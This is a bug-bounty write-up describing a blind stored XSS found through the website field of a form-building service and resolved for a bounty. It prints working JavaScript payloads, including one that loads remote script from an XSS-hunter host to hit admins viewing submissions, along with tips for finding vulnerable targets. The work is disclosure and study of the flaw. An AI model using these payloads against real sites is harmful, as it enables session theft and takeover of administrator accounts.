Document Title : Hack Your Form - New vector for Blind XSS

Author : Youssef A. Mohamed views : 54 Date : 2019-01-14

Description :

Talking about bypassing couple of filters to execute malicious javascript codes easily and achieve a Blind Stored XSS.


Youssef A. Mohamed  "I found this issue in alot of targets so i will take one of these programs as an example."


The program is private so let's call it redacted.com


Recently i was testing in this program and after some recon i found that the website offer a specific service (Create Forms).


How this service work?

1)Creator User create form

2)Creator User share the link with visitor

3)Visitor fill the form

4)The filled information will be available for the Form's Creator at redacted.com/manager/{Form ID}/


So while testing the "Creating form" functions, I've found that there's a Website input


I made a simple form.





Then opened as the form as a visitor.


At the first i tried to bypass it as the basic style:

(thought that if i wrote website.com?"payload it will executed)


So i entered:

https://example.com/?"""


( " + url encoded + html entities encoded)


Then opened the creator account to see what happened.


But unfortunately the filter encoded the double quotes.

https://example.com"""


and noticed that the Link rendered in (a tag)






So i decided to a grab a cup of coffee :"D




After few minutes of deep thinking while drinking my coffee about how i will bypass this one.

I decided to start fuzzing in this input specially.. {Enter Website}


While I'm fuzzing i noticed that the filter accepted test:https://example.com !




Youssef A. Mohamed

Said " then tried [removed]https//evil.com and it worked "

Now I'm sure that there's XSS here

but it's need real website merged with my payload so i wrote this one.

[removed]x='http://x.c';alert('xss');//

Finally executed!



But wait we want to make it Blind XSS to attack the real admins (The best scenario).

So the last payload was:


[removed]eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'






¯\_(?)_/¯


That's it!




Notes:


 80% of my targets which have Website's input was vulnerable to the same scenario.

 To make sure that your target is vulnerable to the same problem you need few steps to make sure:

A. Check if the website is accepting other URI scheme like [removed]https://generaleg0x01.com or not?


B. Check if the website is rendering your https://generaleg0x01.com on HTML 'a' tag or not?


And in the most similar situations the same payload will work perfectly.

Timeline:

20 December, 2018: Report Submitted

25 December, 2018: Report Reviewed and Triaged

30 December, 2018: Report Resolved & 800$ Bounty Awarded

A minute please!


Building a website, an application or any kind of business? Or already have one? Worried about your security? Contact me before going public and let me protect your business!

Responsive image